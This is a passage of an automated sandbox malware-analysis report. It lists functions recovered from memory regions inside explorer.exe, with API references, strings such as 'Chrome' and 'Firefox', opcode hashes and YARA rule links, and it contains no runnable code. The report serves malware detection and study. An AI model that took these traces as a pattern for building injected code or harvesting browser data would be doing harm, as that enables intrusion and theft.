                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B317766
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B31778D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: 1
                                                                                                                                                                                                                                  • API String ID: 28428206-2212294583
                                                                                                                                                                                                                                  • Opcode ID: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                                  • Instruction ID: 8557216ba00e1867df684a7c5618561e7e5d4e5b550d51c7e706247e482fd368
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1212C6862CAC8CEE31F673848843353ADDEF5B545F3C08E9C496CB656DD558D428361
                                                                                                                                                                                                                                  Function 0DF223E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79sleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Sleep
                                                                                                                                                                                                                                  • String ID: PJe
                                                                                                                                                                                                                                  • API String ID: 556109852-4051647479
                                                                                                                                                                                                                                  • Opcode ID: edb00f3df5e898fe9bb0f1e8cccf63862574217c03a43c2f4aae342ed2d9ba3a
                                                                                                                                                                                                                                  • Instruction ID: 38cb6f9c9899060271f6938bca8862089fe18bf49cc70ad29060b6c0bed40b47
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edb00f3df5e898fe9bb0f1e8cccf63862574217c03a43c2f4aae342ed2d9ba3a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99218431608B5086D714EF6AB84436E77A1FBC5FE0F198129DF9A57B54CF38C5928708
                                                                                                                                                                                                                                  Function 0E0EB8F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 0E0EB902
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0E0EB90E
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC2AC: _FF_MSGBANNER.LIBCMT ref: 0E0EC2DC
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC2AC: _NMSG_WRITE.LIBCMT ref: 0E0EC2E6
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC2AC: HeapAlloc.KERNEL32 ref: 0E0EC301
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC2AC: _callnewh.LIBCMT ref: 0E0EC31A
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC2AC: _errno.LIBCMT ref: 0E0EC325
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC2AC: _errno.LIBCMT ref: 0E0EC330
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0E0EB957
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC374: RtlPcToFileHeader.NTDLL ref: 0E0EC403
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC374: RaiseException.KERNEL32 ref: 0E0EC442
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                  • Opcode ID: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                                  • Instruction ID: e2c7cc90f6bfa4b92cf3f6cf72c2797f95ba18f52b928449fcb06295d665b4b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE01F571701B8989DF249B65F5943A8A390E7997C4F480830CA8D0BF24EE7DC995CB00
                                                                                                                                                                                                                                  Function 0DF3B8F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 0DF3B902
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0DF3B90E
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C2AC: _FF_MSGBANNER.LIBCMT ref: 0DF3C2DC
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C2AC: _NMSG_WRITE.LIBCMT ref: 0DF3C2E6
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C2AC: HeapAlloc.KERNEL32 ref: 0DF3C301
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C2AC: _callnewh.LIBCMT ref: 0DF3C31A
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C2AC: _errno.LIBCMT ref: 0DF3C325
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C2AC: _errno.LIBCMT ref: 0DF3C330
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0DF3B957
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C374: RtlPcToFileHeader.NTDLL ref: 0DF3C403
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C374: RaiseException.KERNEL32 ref: 0DF3C442
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                  • Opcode ID: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                                  • Instruction ID: 3e5a520c019fd47016d85fedea400e4ee1aaeb63f7b2cf82cfacf50664c6a558
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72017521709F4A91DF249B99F9903787354E7897C8F4AC021DB8E0BB68EE3DC695C700
                                                                                                                                                                                                                                  Function 1020B8F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 1020B902
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 1020B90E
                                                                                                                                                                                                                                    • Part of subcall function 1020C2AC: _FF_MSGBANNER.LIBCMT ref: 1020C2DC
                                                                                                                                                                                                                                    • Part of subcall function 1020C2AC: _NMSG_WRITE.LIBCMT ref: 1020C2E6
                                                                                                                                                                                                                                    • Part of subcall function 1020C2AC: HeapAlloc.KERNEL32 ref: 1020C301
                                                                                                                                                                                                                                    • Part of subcall function 1020C2AC: _callnewh.LIBCMT ref: 1020C31A
                                                                                                                                                                                                                                    • Part of subcall function 1020C2AC: _errno.LIBCMT ref: 1020C325
                                                                                                                                                                                                                                    • Part of subcall function 1020C2AC: _errno.LIBCMT ref: 1020C330
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 1020B957
                                                                                                                                                                                                                                    • Part of subcall function 1020C374: RtlPcToFileHeader.NTDLL ref: 1020C403
                                                                                                                                                                                                                                    • Part of subcall function 1020C374: RaiseException.KERNEL32 ref: 1020C442
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                  • Opcode ID: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                                  • Instruction ID: 5f4120aca7d895a78cfd08907256d974815d235eede52b4bd475c5bbdff3eff2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0501C035711B4A91DF24DB91B4853A86354E7897C4F540020EE8D07B28EA7DD1A5CF00
                                                                                                                                                                                                                                  Function 0E0FE6CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC81C: _getptd.LIBCMT ref: 0E0EC829
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC81C: _inconsistency.LIBCMT ref: 0E0EC837
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC81C: _getptd.LIBCMT ref: 0E0EC83C
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC81C: _inconsistency.LIBCMT ref: 0E0EC858
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0E0FE717
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0FE71D
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0FE730
                                                                                                                                                                                                                                    • Part of subcall function 0E0EC8AC: _getptd.LIBCMT ref: 0E0EC8B5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                                  • Instruction ID: 0d82cc3bf4a44db8094f2482d9fb4730601c05392467c5cad1733b1f863b0fec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF04F36641782C9CB60AF31D8802AD23E5E785BAAF495931DF494BF18DF34CCA2CB41
                                                                                                                                                                                                                                  Function 0DF4E6CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C81C: _getptd.LIBCMT ref: 0DF3C829
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C81C: _inconsistency.LIBCMT ref: 0DF3C837
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C81C: _getptd.LIBCMT ref: 0DF3C83C
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C81C: _inconsistency.LIBCMT ref: 0DF3C858
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0DF4E717
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF4E71D
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF4E730
                                                                                                                                                                                                                                    • Part of subcall function 0DF3C8AC: _getptd.LIBCMT ref: 0DF3C8B5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 53c7e99812ad044b33180f8e2fd9dc7e725c094cf5fc87ebb348c38e51aeede4
                                                                                                                                                                                                                                  • Instruction ID: 4f77706d1d4b2ac295e9ff504153942010286ca5a3f96c82afbebf4c44793553
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53c7e99812ad044b33180f8e2fd9dc7e725c094cf5fc87ebb348c38e51aeede4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F03C26A416418ACB20AF39EC802BD3765FB45BAAF4AD425EB594B704DE30C985CB41
                                                                                                                                                                                                                                  Function 1021E6CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 1020C81C: _getptd.LIBCMT ref: 1020C829
                                                                                                                                                                                                                                    • Part of subcall function 1020C81C: _inconsistency.LIBCMT ref: 1020C837
                                                                                                                                                                                                                                    • Part of subcall function 1020C81C: _getptd.LIBCMT ref: 1020C83C
                                                                                                                                                                                                                                    • Part of subcall function 1020C81C: _inconsistency.LIBCMT ref: 1020C858
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 1021E717
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 1021E71D
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 1021E730
                                                                                                                                                                                                                                    • Part of subcall function 1020C8AC: _getptd.LIBCMT ref: 1020C8B5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                                  • Instruction ID: ae4dc6cfb2d4dbe31301afa8e3ec54248662424d383144f779e7624bd9574544
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF03C6A24078689DB24EF31D8813AD23A5E745B9AF655421EE494FB08DE30D8E28F41
                                                                                                                                                                                                                                  Function 0E0D40F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-3789238822
                                                                                                                                                                                                                                  • Opcode ID: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                                  • Instruction ID: 9a88246d45cc3b1dbdb257fadbc6000e1ebb09324810c513544a581c4f282f4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97F0A7B571574183FF544B55F8943A12390DB983A1F082424D92A46394EE7CC9D9C704
                                                                                                                                                                                                                                  Function 0DF240F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-3789238822
                                                                                                                                                                                                                                  • Opcode ID: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                                  • Instruction ID: e3a923cc8460d48cf97062d0320fd3847d1029c03b90e9e7b2fea623d046e720
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44F08291B1170292FF558B95F8953712250DB94365F086035DA1F46394EE7CC5D9C710
                                                                                                                                                                                                                                  Function 101F40F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-3789238822
                                                                                                                                                                                                                                  • Opcode ID: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                                  • Instruction ID: bc8c7ef448abf6f80046ea278f60636baa60f071789cc4f2ccdb3a8ca0c33fdd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6F0A7B1715701C3FF848B95F8983A12351DB983A1F482024D96E46795EF7CC9D9CB00
                                                                                                                                                                                                                                  Function 0E0EA070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0D8B60: HeapCreate.KERNEL32 ref: 0E0D8B7D
                                                                                                                                                                                                                                    • Part of subcall function 0E0EB640: lstrcpyA.KERNEL32 ref: 0E0EB694
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0E0EA0A1
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0E0EA0AE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                                  • String ID: Chrome$Firefox
                                                                                                                                                                                                                                  • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                                  • Opcode ID: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                                  • Instruction ID: 86711cbb6031f6524a782a8481e6f999fa41cb8d5127161797a90c1c8d797d19
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88E099B4A12F8294EA48EB10FC943C833A8F759304F908AE1D65D62370EF7C869AC711
                                                                                                                                                                                                                                  Function 0DF3A070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF28B60: HeapCreate.KERNEL32 ref: 0DF28B7D
                                                                                                                                                                                                                                    • Part of subcall function 0DF3B640: lstrcpyA.KERNEL32 ref: 0DF3B694
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0DF3A0A1
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0DF3A0AE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                                  • String ID: Chrome$Firefox
                                                                                                                                                                                                                                  • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                                  • Opcode ID: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                                  • Instruction ID: b5230c777bb12ccde1c63aa71ebde349a4f23fbe6a4d5c102760bb093696d0b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26E07E64511E0394EA00AB91FCA43643378B754394F91827B850F42BB0EF38C9598765
                                                                                                                                                                                                                                  Function 1020A070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 101F8B60: HeapCreate.KERNEL32 ref: 101F8B7D
                                                                                                                                                                                                                                    • Part of subcall function 1020B640: lstrcpyA.KERNEL32 ref: 1020B694
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 1020A0A1
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 1020A0AE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection$CreateHeaplstrcpy
